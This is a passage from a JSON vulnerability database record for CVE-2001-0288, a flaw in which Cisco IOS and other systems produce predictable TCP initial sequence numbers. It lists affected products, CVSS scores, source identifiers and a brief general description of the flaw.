        "vendor": "sgi",
        "version": "6.5.10"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.9"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.9"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.9"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.8"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.8"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.8"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.7"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.7"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.7"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.6"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.6"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.6"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.5"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.5"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.5"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.4"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.4"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.4"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.3"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.3"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.3"
      },
      {
        "model": "irix m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.2"
      },
      {
        "model": "irix f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.2"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.2"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5.1"
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "6.5"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openbsd",
        "version": "2.8"
      },
      {
        "model": "windows nt workstation sp6a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp6a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows 98se",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "98"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "95"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.1.x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.x"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.11"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.04"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.20"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "-stablepre050201",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "4.2"
      },
      {
        "model": "-stablepre050201",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "3.5"
      },
      {
        "model": "ios 12.1yd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.1xx"
      },
      {
        "model": "ios 12.1xw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.1xv"
      },
      {
        "model": "ios 12.1xu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ex",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ec",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1dc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1cx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1aa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.0xv"
      },
      {
        "model": "ios 12.0xu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xp",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xn",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0wt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0w5",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0st",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0s",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0dc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "12.0"
      },
      {
        "model": "ios 11.3wa4",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3na",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3ma",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3ha",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3db",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3da",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3aa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.3 xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.3"
      },
      {
        "model": "ios 11.2wa3",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2sa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2p",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2gs",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2f",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.2bc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "ios 11.1ia",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1ct",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1cc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1ca",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 11.1aa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "4.0"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "3.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "99.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "99.0.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "99.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "88.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.5.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.5.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.5.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.1.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.0.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "77.0"
      },
      {
        "model": "rtu500 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "abb",
        "version": "11.3"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.x"
      },
      {
        "model": "rtu500 series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "abb",
        "version": "11.4.1"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "ios",
        "version": "*"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Originally discovered by Tim Newsham \u003ctim.newsham@guardent.com\u003e.",
    "sources": [
      {
        "db": "BID",
        "id": "2682"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2001-0288",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.2,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-3110",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2001-0288",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200105-050",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "IVD",
            "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-3110",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULHUB",
        "id": "VHN-3110"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco switches and routers running IOS 12.1 and earlier produce predictable TCP Initial Sequence Numbers (ISNs), which allows remote attackers to spoof or hijack TCP connections. Over the past several years, a variety of attacks against TCP initial sequence number (ISN) generation have been discussed. \nA vulnerability exists in some TCP/IP stack implementations that use random increments for initial sequence numbers.  Such implementations are vulnerable to statistical attack, which could allow an attacker to predict, within a reasonable range, sequence numbers of future and existing connections. \nBy predicting a sequence number, several attacks could be performed; an attacker could disrupt or hijack existing connections, or spoof future connections",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULHUB",
        "id": "VHN-3110"
      }
    ],
    "trust": 1.44
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-3110",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-3110"
      }
    ]
  },
  "external_ids": {
    "@context": {
